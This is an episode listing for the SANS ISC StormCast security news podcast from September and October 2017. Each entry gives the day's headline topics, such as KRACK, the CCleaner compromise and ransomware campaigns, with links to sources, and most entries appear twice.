ISC StormCast for Tuesday, October 24th 2017

Is a Telco in Brazil Hosing An Epidemic of Open SOCKS Proxies? https://isc.sans.edu/forums/diary/Is+a+telco+in+Brazil+hosting+an+epidemic+of+open+SOCKS+proxies/22956/ Android May Be Adding DNS Over TLS https://www.xda-developers.com https://tools.ietf.org/html/rfc7858 Fake Crypto Currency Trading Applications https://www.welivesecurity.com/2017/10/23/fake-cryptocurrency-apps-google-harvesting-credentials/
10/23/20176 minutes, 3 seconds
Episode Artwork

ISC StormCast for Sunday, October 22nd 2017

IoT "Reaper" Botnet http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/ https://research.checkpoint.com/new-iot-botnet-storm-coming/ Elmedia Player and Folx Infected with Proton Malware https://www.eltima.com/blog/2017/10/elmedia-player-and-folx-malware-threat-neutralized.html Google Expands Bug Bounty To Popular Android Apps https://www.google.com/about/appsecurity/play-rewards/index.html Increased Use of Last Week's Flash Vulnerability https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed
10/22/20175 minutes, 38 seconds
Episode Artwork

ISC StormCast for Sunday, October 22nd 2017

IoT "Reaper" Botnet http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/ https://research.checkpoint.com/new-iot-botnet-storm-coming/ Elmedia Player and Folx Infected with Proton Malware https://www.eltima.com/blog/2017/10/elmedia-player-and-folx-malware-threat-neutralized.html Google Expands Bug Bounty To Popular Android Apps https://www.google.com/about/appsecurity/play-rewards/index.html Increased Use of Last Week's Flash Vulnerability https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed
10/22/20175 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, October 20th 2017

Locky Ransomware Updates https://isc.sans.edu/forums/diary/Necurs+Botnet+malspam+pushes+Locky+using+DDE+attack/22946/ https://isc.sans.edu/forums/diary/HSBCthemed+malspam+uses+ISO+attachments+to+push+Loki+Bot+malware/22942/ Authedmine To Replace Coinhive https://coinhive.com/blog/authedmine Attackers Scan for SSH Keys via Webexploits https://www.wordfence.com/blog/2017/10/ssh-key-website-scans/ Attacking Colocated Virtual Machines with Rowhammer https://thisissecurity.stormshield.com/2017/10/19/attacking-co-hosted-vm-hacker-hammer-two-memory-modules/
10/20/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, October 20th 2017

Locky Ransomware Updates https://isc.sans.edu/forums/diary/Necurs+Botnet+malspam+pushes+Locky+using+DDE+attack/22946/ https://isc.sans.edu/forums/diary/HSBCthemed+malspam+uses+ISO+attachments+to+push+Loki+Bot+malware/22942/ Authedmine To Replace Coinhive https://coinhive.com/blog/authedmine Attackers Scan for SSH Keys via Webexploits https://www.wordfence.com/blog/2017/10/ssh-key-website-scans/ Attacking Colocated Virtual Machines with Rowhammer https://thisissecurity.stormshield.com/2017/10/19/attacking-co-hosted-vm-hacker-hammer-two-memory-modules/
10/20/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, October 19th 2017

Baselining Servers to Detect Outliers https://isc.sans.edu/forums/diary/Baselining+Servers+to+Detect+Outliers/22940/ Test Script Available for KRACK Vulnerability https://github.com/vanhoefm/krackattacks-test-ap-ft WaterMiner Distributed With Gaming Mods https://minerva-labs.com/post/waterminer-a-new-evasive-crypto-miner Microsoft Releases Fall Creators Update https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/#76CQXoUYxT81RLJi.97
10/19/20175 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, October 19th 2017

Baselining Servers to Detect Outliers https://isc.sans.edu/forums/diary/Baselining+Servers+to+Detect+Outliers/22940/ Test Script Available for KRACK Vulnerability https://github.com/vanhoefm/krackattacks-test-ap-ft WaterMiner Distributed With Gaming Mods https://minerva-labs.com/post/waterminer-a-new-evasive-crypto-miner Microsoft Releases Fall Creators Update https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/#76CQXoUYxT81RLJi.97
10/19/20175 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, October 18th 2017

Hancitor Malspam Uses DDE Attack To Spread Banking Malware https://isc.sans.edu/forums/diary/Hancitor+malspam+uses+DDE+attack/22936/ Infineon RSA Key Generation Weakness https://crocs.fi.muni.cz/public/papers/rsa_ccs17 Chrome Improving Security https://www.blog.google/products/chrome/cleaner-safer-web-chrome-cleanup/
10/18/20175 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, October 18th 2017

Hancitor Malspam Uses DDE Attack To Spread Banking Malware https://isc.sans.edu/forums/diary/Hancitor+malspam+uses+DDE+attack/22936/ Infineon RSA Key Generation Weakness https://crocs.fi.muni.cz/public/papers/rsa_ccs17 Chrome Improving Security https://www.blog.google/products/chrome/cleaner-safer-web-chrome-cleanup/
10/18/20175 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, October 17th 2017

WPA2 "Krack" Attack https://www.krackattacks.com/ https://securingthehuman.sans.org/blog/2017/10/16/28748/ Adobe Flash Player Update https://helpx.adobe.com/security/products/flash-player/apsb17-32.html Two (identical) uTorrent Binaries With Different Hashes https://isc.sans.edu/forums/diary/Its+in+the+signature/22928/
10/16/20178 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, October 17th 2017

WPA2 "Krack" Attack https://www.krackattacks.com/ https://securingthehuman.sans.org/blog/2017/10/16/28748/ Adobe Flash Player Update https://helpx.adobe.com/security/products/flash-player/apsb17-32.html Two (identical) uTorrent Binaries With Different Hashes https://isc.sans.edu/forums/diary/Its+in+the+signature/22928/
10/16/20178 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, October 16th 2017

Peeking Into an Outlook .msg File https://isc.sans.edu/forums/diary/Peeking+into+msg+files/22926/ Abandoned Domains / Equifax/Transunion Lead to Fake Falsh Update https://blog.malwarebytes.com/threat-analysis/2017/10/equifax-transunion-websites-push-fake-flash-player/ Microsoft Patch Causes Corrupted Systems https://support.microsoft.com/en-us/help/4049094 DoubleLocker Android Ransomware https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/ Chrome Extension Mines Crypto Currency https://www.bleepingcomputer.com/news/security/chrome-extension-uses-your-gmail-to-register-domains-names-and-injects-coinhive/
10/15/20175 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, October 16th 2017

Peeking Into an Outlook .msg File https://isc.sans.edu/forums/diary/Peeking+into+msg+files/22926/ Abandoned Domains / Equifax/Transunion Lead to Fake Falsh Update https://blog.malwarebytes.com/threat-analysis/2017/10/equifax-transunion-websites-push-fake-flash-player/ Microsoft Patch Causes Corrupted Systems https://support.microsoft.com/en-us/help/4049094 DoubleLocker Android Ransomware https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/ Chrome Extension Mines Crypto Currency https://www.bleepingcomputer.com/news/security/chrome-extension-uses-your-gmail-to-register-domains-names-and-injects-coinhive/
10/15/20175 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, October 13th 2017

Version Control Tools Are Not Only For Developers https://isc.sans.edu/forums/diary/Version+control+tools+arent+only+for+Developers/22922/ Coin Hive Javascript Crypto Currency Miner Found on Piratebay https://twitter.com/esterling_/status/918240914623090695 https://crypto-loot.com Macro-less Code Exec in MSWord Rediscovered https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/ Hard Disks Can Be Used As Microphones https://github.com/ortegaalfredo/kscope/blob/master/doc/HDD-microphones.pdf
10/12/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Friday, October 13th 2017

Version Control Tools Are Not Only For Developers https://isc.sans.edu/forums/diary/Version+control+tools+arent+only+for+Developers/22922/ Coin Hive Javascript Crypto Currency Miner Found on Piratebay https://twitter.com/esterling_/status/918240914623090695 https://crypto-loot.com Macro-less Code Exec in MSWord Rediscovered https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/ Hard Disks Can Be Used As Microphones https://github.com/ortegaalfredo/kscope/blob/master/doc/HDD-microphones.pdf
10/12/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, October 12th 2017

Outlook Includes plain text version of e-mail with S/MIME Encryption https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/index.html RubyGems Remote Code Execution Vulnerability http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html Google Home Mini Recorded Everything http://www.androidpolice.com/2017/10/10/google-nerfing-home-minis-mine-spied-everything-said-247/ Cameradar Finds Open RTSP Streams https://github.com/EtixLabs/cameradar
10/11/20176 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, October 12th 2017

Outlook Includes plain text version of e-mail with S/MIME Encryption https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/index.html RubyGems Remote Code Execution Vulnerability http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html Google Home Mini Recorded Everything http://www.androidpolice.com/2017/10/10/google-nerfing-home-minis-mine-spied-everything-said-247/ Cameradar Finds Open RTSP Streams https://github.com/EtixLabs/cameradar
10/11/20176 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, October 11th 2017

Microsoft Monthly Updates https://isc.sans.edu/forums/diary/October+2017+Security+Updates/22916/ Spoofed iOS iCloud Login https://krausefx.com/blog/ios-privacy-stealpassword-easily-get-the-users-apple-id-password-just-by-asking
10/11/20175 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, October 11th 2017

Microsoft Monthly Updates https://isc.sans.edu/forums/diary/October+2017+Security+Updates/22916/ Spoofed iOS iCloud Login https://krausefx.com/blog/ios-privacy-stealpassword-easily-get-the-users-apple-id-password-just-by-asking
10/11/20175 minutes, 53 seconds
Episode Artwork

ISC StormCast for Tuesday, October 10th 2017

Base64 Encoded Word Documents https://isc.sans.edu/forums/diary/Base64+All+The+Things/22912/ Skimmer Scanner Helps Find Credit Card Skimmers https://github.com/sparkfunX/Skimmer_Scanner TLS 1.3 Remains "On Hold" https://www.ietf.org/mail-archive/web/tls/current/msg24517.html FIDO U2F Key Review / Test https://www.imperialviolet.org/2017/10/08/securitykeytest.html
10/9/20176 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, October 10th 2017

Base64 Encoded Word Documents https://isc.sans.edu/forums/diary/Base64+All+The+Things/22912/ Skimmer Scanner Helps Find Credit Card Skimmers https://github.com/sparkfunX/Skimmer_Scanner TLS 1.3 Remains "On Hold" https://www.ietf.org/mail-archive/web/tls/current/msg24517.html FIDO U2F Key Review / Test https://www.imperialviolet.org/2017/10/08/securitykeytest.html
10/9/20176 minutes, 33 seconds
Episode Artwork

ISC StormCast for Sunday, October 8th 2017

Payment Handler API https://w3c.github.io/payment-handler/ https://blog.lukaszolejnik.com/privacy-of-web-request-api/ OpenSSH Version 7.6 Released http://www.openssh.com/txt/release-7.6 Microsoft Delaying Some Patches for Earlier Windows Versions https://googleprojectzero.blogspot.sg/2017/10/using-binary-diffing-to-discover.html The Dangers of Cables https://isc.sans.edu/forums/diary/Whats+in+a+cable+The+dangers+of+unauthorized+cables/22904/
10/8/20178 minutes, 11 seconds
Episode Artwork

ISC StormCast for Sunday, October 8th 2017

Payment Handler API https://w3c.github.io/payment-handler/ https://blog.lukaszolejnik.com/privacy-of-web-request-api/ OpenSSH Version 7.6 Released http://www.openssh.com/txt/release-7.6 Microsoft Delaying Some Patches for Earlier Windows Versions https://googleprojectzero.blogspot.sg/2017/10/using-binary-diffing-to-discover.html The Dangers of Cables https://isc.sans.edu/forums/diary/Whats+in+a+cable+The+dangers+of+unauthorized+cables/22904/
10/8/20178 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, October 6th 2017

Extract HTTP Requests from PCAPs and Turn Them Into cURL Commands https://isc.sans.edu/forums/diary/pcap2curl+Turning+a+pcap+file+into+a+set+of+cURL+commands+for+replay/22900/ Apple Patches Embarrasing MacOS High Sierra Flaw https://www.appleworld.today/blog/2017/10/5/macos-high-sierra-flaw-exposes-passwords-of-encrypted-apfs-volumes Another Tomcat PUT Vulnerability https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E Dallas Haselhorst: HL7 Healthcare Protocol https://www.sans.org/reading-room/whitepapers/hipaa/hl7-data-interfaces-medical-environments-understanding-fundamental-flaw-healthcare-38005 https://www.sans.org/reading-room/whitepapers/vpns/hl7-data-interfaces-medical-environments-attacking-defending-achilles-heel-healthcare-38010 https://www.tripwire.com/state-of-security/security-data-protection/hl7-data-interfaces-in-medical-environments/
10/6/201715 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, October 6th 2017

Extract HTTP Requests from PCAPs and Turn Them Into cURL Commands https://isc.sans.edu/forums/diary/pcap2curl+Turning+a+pcap+file+into+a+set+of+cURL+commands+for+replay/22900/ Apple Patches Embarrasing MacOS High Sierra Flaw https://www.appleworld.today/blog/2017/10/5/macos-high-sierra-flaw-exposes-passwords-of-encrypted-apfs-volumes Another Tomcat PUT Vulnerability https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E Dallas Haselhorst: HL7 Healthcare Protocol https://www.sans.org/reading-room/whitepapers/hipaa/hl7-data-interfaces-medical-environments-understanding-fundamental-flaw-healthcare-38005 https://www.sans.org/reading-room/whitepapers/vpns/hl7-data-interfaces-medical-environments-attacking-defending-achilles-heel-healthcare-38010 https://www.tripwire.com/state-of-security/security-data-protection/hl7-data-interfaces-in-medical-environments/
10/6/201715 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, October 5th 2017

Cyber Security Awareness Month: Ouch! Newsletter https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201710_en.pdf Modified Rowhammer Attack Bypasses Current Defenses https://arxiv.org/pdf/1710.00551.pdf Metasploit Modules For VMWare Escape https://www.zerodayinitiative.com/blog/2017/10/04/vmware-escapology-how-to-houdini-the-hypervisor
10/4/20175 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, October 5th 2017

Cyber Security Awareness Month: Ouch! Newsletter https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201710_en.pdf Modified Rowhammer Attack Bypasses Current Defenses https://arxiv.org/pdf/1710.00551.pdf Metasploit Modules For VMWare Escape https://www.zerodayinitiative.com/blog/2017/10/04/vmware-escapology-how-to-houdini-the-hypervisor
10/4/20175 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, October 4th 2017

Fedex Malspam Pushes Formbook Infostealer Malware https://isc.sans.edu/forums/diary/Malspam+pushing+Formbook+info+stealer/22888/ Wordpress Plugins Heavily Abused For Site Defacements https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/ Fake WordPress Security Plugin Being Advertised https://blog.sucuri.net/2017/09/fake-plugins-fake-security.html Proof Of Concept Information Disclosure for Internet Explorer https://www.brokenbrowser.com/revealing-the-content-of-the-address-bar-ie/ Nzyme Wifi Frame Recording and Forensics https://wtf.horse/2017/10/02/introducing-nzyme-wifi-802-11-frame-recording-and-forensics/ Cyber Security Interviews https://twitter.com/CSI_Podcast/status/915026734801489921
10/4/20176 minutes, 1 second
Episode Artwork

ISC StormCast for Wednesday, October 4th 2017

Fedex Malspam Pushes Formbook Infostealer Malware https://isc.sans.edu/forums/diary/Malspam+pushing+Formbook+info+stealer/22888/ Wordpress Plugins Heavily Abused For Site Defacements https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/ Fake WordPress Security Plugin Being Advertised https://blog.sucuri.net/2017/09/fake-plugins-fake-security.html Proof Of Concept Information Disclosure for Internet Explorer https://www.brokenbrowser.com/revealing-the-content-of-the-address-bar-ie/ Nzyme Wifi Frame Recording and Forensics https://wtf.horse/2017/10/02/introducing-nzyme-wifi-802-11-frame-recording-and-forensics/ Cyber Security Interviews https://twitter.com/CSI_Podcast/status/915026734801489921
10/4/20176 minutes, 1 second
Episode Artwork

ISC StormCast for Tuesday, October 3rd 2017

Passive DNS Investigating Security Incidents with Passive DNS Bypassing Domain Authentication https://medium.freecodecamp.org/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c DNSMasq Vulnerabilities https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
10/3/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Tuesday, October 3rd 2017

Passive DNS Investigating Security Incidents with Passive DNS Bypassing Domain Authentication https://medium.freecodecamp.org/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c DNSMasq Vulnerabilities https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
10/3/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, October 2nd 2017

Who's Borrowing Your Resources. Javascript Monero Miners on Video Sites https://isc.sans.edu/forums/diary/Whos+Borrowing+your+Resources/22882/ OS X Silently Patches Javascript Quarantine Bypass https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html Apple EFI Updates Often Not Applied https://duo.com/blog/the-apple-of-your-efi-mac-firmware-security-research
10/2/20175 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, October 2nd 2017

Who's Borrowing Your Resources. Javascript Monero Miners on Video Sites https://isc.sans.edu/forums/diary/Whos+Borrowing+your+Resources/22882/ OS X Silently Patches Javascript Quarantine Bypass https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html Apple EFI Updates Often Not Applied https://duo.com/blog/the-apple-of-your-efi-mac-firmware-security-research
10/2/20175 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, September 29th 2017

Dealing With Massive Packet Captures https://isc.sans.edu/forums/diary/The+easy+way+to+analyze+huge+amounts+of+PCAP+data/22876/ Illusion Gap Anti-Virus Bypass https://www.cyberark.com/threat-research-blog/illusion-gap-antivirus-bypass-part-1/ DNSSEC KSK Update Delayed https://www.icann.org/news/announcement-2017-09-27-en Linux PIE/Stack Corruption https://www.qualys.com/2017/09/26/cve-2017-1000253/cve-2017-1000253.txt
9/29/20175 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, September 29th 2017

Dealing With Massive Packet Captures https://isc.sans.edu/forums/diary/The+easy+way+to+analyze+huge+amounts+of+PCAP+data/22876/ Illusion Gap Anti-Virus Bypass https://www.cyberark.com/threat-research-blog/illusion-gap-antivirus-bypass-part-1/ DNSSEC KSK Update Delayed https://www.icann.org/news/announcement-2017-09-27-en Linux PIE/Stack Corruption https://www.qualys.com/2017/09/26/cve-2017-1000253/cve-2017-1000253.txt
9/29/20175 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, September 28th 2017

Everything You Ever Wanted To Know About JPEGs (and more) https://isc.sans.edu/forums/diary/It+is+a+resume+Part+3/22808/ Linux 4.14 Memory Encryption https://lwn.net/Articles/686808/ CLKSCREW: Exposing Secure Enclaves via Energy Management https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-tang.pdf ~ ~ ~ ~
9/28/20175 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, September 28th 2017

Everything You Ever Wanted To Know About JPEGs (and more) https://isc.sans.edu/forums/diary/It+is+a+resume+Part+3/22808/ Linux 4.14 Memory Encryption https://lwn.net/Articles/686808/ CLKSCREW: Exposing Secure Enclaves via Energy Management https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-tang.pdf ~ ~ ~ ~
9/28/20175 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, September 27th 2017

XPCTRA Steals Banking / Cryptocurrency Info https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/ Vulnerable Mobile Investment Applications http://blog.ioactive.com/2017/09/are-you-trading-securely-insights-into.html iOS WiFi Exploit PoC Code Published https://bugs.chromium.org/p/project-zero/issues/detail?id=1289 Android Malware Exploiting "Dirty Cow" http://blog.trendmicro.com/trendlabs-security-intelligence/zniu-first-android-malware-exploit-dirty-cow-vulnerability/
9/27/20175 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, September 27th 2017

XPCTRA Steals Banking / Cryptocurrency Info https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/ Vulnerable Mobile Investment Applications http://blog.ioactive.com/2017/09/are-you-trading-securely-insights-into.html iOS WiFi Exploit PoC Code Published https://bugs.chromium.org/p/project-zero/issues/detail?id=1289 Android Malware Exploiting "Dirty Cow" http://blog.trendmicro.com/trendlabs-security-intelligence/zniu-first-android-malware-exploit-dirty-cow-vulnerability/
9/27/20175 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, September 26th 2017

macOS High Sierra Security Updates https://support.apple.com/en-us/HT201222 Possible macOS Keychain Leak https://twitter.com/patrickwardle/status/912254053849079808 Monero Cryptocoin Miner Found on Showtime Website https://badpackets.net/coinhive-miner-found-on-official-showtime-network-websites-in-latest-case-of-cryptojacking/
9/26/20175 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, September 26th 2017

macOS High Sierra Security Updates https://support.apple.com/en-us/HT201222 Possible macOS Keychain Leak https://twitter.com/patrickwardle/status/912254053849079808 Monero Cryptocoin Miner Found on Showtime Website https://badpackets.net/coinhive-miner-found-on-official-showtime-network-websites-in-latest-case-of-cryptojacking/
9/26/20175 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, September 25th 2017

Forensic Use of "mount --bind" https://isc.sans.edu/forums/diary/Forensic+use+of+mount+bind/22854/ Adobe Publishes Secret PGP Key By Mistake https://twitter.com/jupenur/status/911286403434246144 AVAST Publishes CCleaner Update https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident Compromised Android Keyboard App https://blog.adguard.com/en/go-spy-go-popular-android-keyboard-from-china-crosses-the-red-line/
9/25/20176 minutes
Episode Artwork

ISC StormCast for Monday, September 25th 2017

Forensic Use of "mount --bind" https://isc.sans.edu/forums/diary/Forensic+use+of+mount+bind/22854/ Adobe Publishes Secret PGP Key By Mistake https://twitter.com/jupenur/status/911286403434246144 AVAST Publishes CCleaner Update https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident Compromised Android Keyboard App https://blog.adguard.com/en/go-spy-go-popular-android-keyboard-from-china-crosses-the-red-line/
9/25/20176 minutes
Episode Artwork

ISC StormCast for Friday, September 22nd 2017

More (Likely Fake) DDoS Extortion Attempts https://isc.sans.edu/forums/diary/Emails+threatening+DDoS+allegedly+from+Phantom+Squad/22856/ CVE-2017-8759 Used in Cyber Crime Attacks https://isc.sans.edu/forums/diary/Email+attachment+using+CVE20178759+exploit+targets+Argentina/22850/ CCleaner Command and Control Server http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html?m=1 Vulnerability in Intel Managment Engine Can Lead to Execution of Unsigned Code https://www.blackhat.com/eu-17/briefings/schedule/#how-to-hack-a-turned-off-computer-or-running-unsigned-code-in-intel-management-engine-8668
9/22/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, September 22nd 2017

More (Likely Fake) DDoS Extortion Attempts https://isc.sans.edu/forums/diary/Emails+threatening+DDoS+allegedly+from+Phantom+Squad/22856/ CVE-2017-8759 Used in Cyber Crime Attacks https://isc.sans.edu/forums/diary/Email+attachment+using+CVE20178759+exploit+targets+Argentina/22850/ CCleaner Command and Control Server http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html?m=1 Vulnerability in Intel Managment Engine Can Lead to Execution of Unsigned Code https://www.blackhat.com/eu-17/briefings/schedule/#how-to-hack-a-turned-off-computer-or-running-unsigned-code-in-intel-management-engine-8668
9/22/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, September 21st 2017

Newest Locky Update: RAR Attachments and "Invoice" E-Mails https://isc.sans.edu/forums/diary/Ongoing+Ykcol+Locky+campaign/22848/ Viacom S3 Bucket Leak https://www.upguard.com/breaches/cloud-leak-viacom iOS 11 Outlook.com Bug https://support.apple.com/en-us/HT208136
9/21/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, September 21st 2017

Newest Locky Update: RAR Attachments and "Invoice" E-Mails https://isc.sans.edu/forums/diary/Ongoing+Ykcol+Locky+campaign/22848/ Viacom S3 Bucket Leak https://www.upguard.com/breaches/cloud-leak-viacom iOS 11 Outlook.com Bug https://support.apple.com/en-us/HT208136
9/21/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, September 20th 2017

Mac-Robber Python Rewrite https://isc.sans.edu/forums/diary/New+tool+macrobberpy/22844/ Apache Tomcat Patch https://www.us-cert.gov/ncas/current-activity/2017/09/19/Apache-Releases-Security-Updates-Apache-Tomcat Apple Updates For iOS, Xcode, tvOS, watchOS and Safari https://support.apple.com/en-us/HT201222
9/20/20176 minutes, 1 second
Episode Artwork

ISC StormCast for Wednesday, September 20th 2017

Mac-Robber Python Rewrite https://isc.sans.edu/forums/diary/New+tool+macrobberpy/22844/ Apache Tomcat Patch https://www.us-cert.gov/ncas/current-activity/2017/09/19/Apache-Releases-Security-Updates-Apache-Tomcat Apple Updates For iOS, Xcode, tvOS, watchOS and Safari https://support.apple.com/en-us/HT201222
9/20/20176 minutes, 1 second
Episode Artwork

ISC StormCast for Tuesday, September 19th 2017

CCleaner Compromise http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html http://www.piriform.com/news/release-announcements/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users Word INCLUDEPICTURE Feature Abuse https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/ security.txt file https://www.ietf.org/id/draft-foudil-securitytxt-00.txt https://www.ietf.org/rfc/rfc2142.txt
9/19/20178 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, September 19th 2017

CCleaner Compromise http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html http://www.piriform.com/news/release-announcements/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users Word INCLUDEPICTURE Feature Abuse https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/ security.txt file https://www.ietf.org/id/draft-foudil-securitytxt-00.txt https://www.ietf.org/rfc/rfc2142.txt
9/19/20178 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, September 18th 2017

Bashware: Bypassing Windows Security via Linux (WSL) https://research.checkpoint.com/beware-bashware-new-method-malware-bypass-security-solutions/ Javascript Rogue Crypto Currency Miner https://www.welivesecurity.com/2017/09/14/cryptocurrency-web-mining-union-profit/ NodeJS Hash Table DoS https://medium.com/@ahmadbamieh/nodejs-constant-hashtables-seeds-vulnerability-f03bf70e3593 HTTPS Interception https://blog.cloudflare.com/understanding-the-prevalence-of-web-traffic-interception/
9/18/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, September 18th 2017

Bashware: Bypassing Windows Security via Linux (WSL) https://research.checkpoint.com/beware-bashware-new-method-malware-bypass-security-solutions/ Javascript Rogue Crypto Currency Miner https://www.welivesecurity.com/2017/09/14/cryptocurrency-web-mining-union-profit/ NodeJS Hash Table DoS https://medium.com/@ahmadbamieh/nodejs-constant-hashtables-seeds-vulnerability-f03bf70e3593 HTTPS Interception https://blog.cloudflare.com/understanding-the-prevalence-of-web-traffic-interception/
9/18/20175 minutes, 54 seconds
Episode Artwork

ISC StormCast for Friday, September 15th 2017

Another Webshell; Another Backdoor https://isc.sans.edu/forums/diary/Another+webshell+another+backdoor/22826/ D-Link Vulnerability https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html Chrome To Label FTP As Insecure https://groups.google.com/a/chromium.org/forum/#!msg/security-dev/HknIAQwMoWo/xYyezYV5AAAJ More Google Play Store Malware https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/ Elasticsearch Botnet https://mackeepersecurity.com/post/kromtech-discovers-massive-elasticsearch-infected-malware-botnet
9/15/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, September 15th 2017

Another Webshell; Another Backdoor https://isc.sans.edu/forums/diary/Another+webshell+another+backdoor/22826/ D-Link Vulnerability https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html Chrome To Label FTP As Insecure https://groups.google.com/a/chromium.org/forum/#!msg/security-dev/HknIAQwMoWo/xYyezYV5AAAJ More Google Play Store Malware https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/ Elasticsearch Botnet https://mackeepersecurity.com/post/kromtech-discovers-massive-elasticsearch-infected-malware-botnet
9/15/20175 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, September 14th 2017

No IPv6? Challenge Accepted https://isc.sans.edu/forums/diary/No+IPv6+Challenge+Accepted+Part+1/22820/ Exploiting CVE-2017-8759 https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/ Wordpress Plugin Found With Backdoor https://www.pluginvulnerabilities.com/2017/09/11/wordpress-poor-handling-of-plugin-security-exacerbates-malicious-takeover-of-display-widgets/
9/14/20175 minutes
Episode Artwork

ISC StormCast for Thursday, September 14th 2017

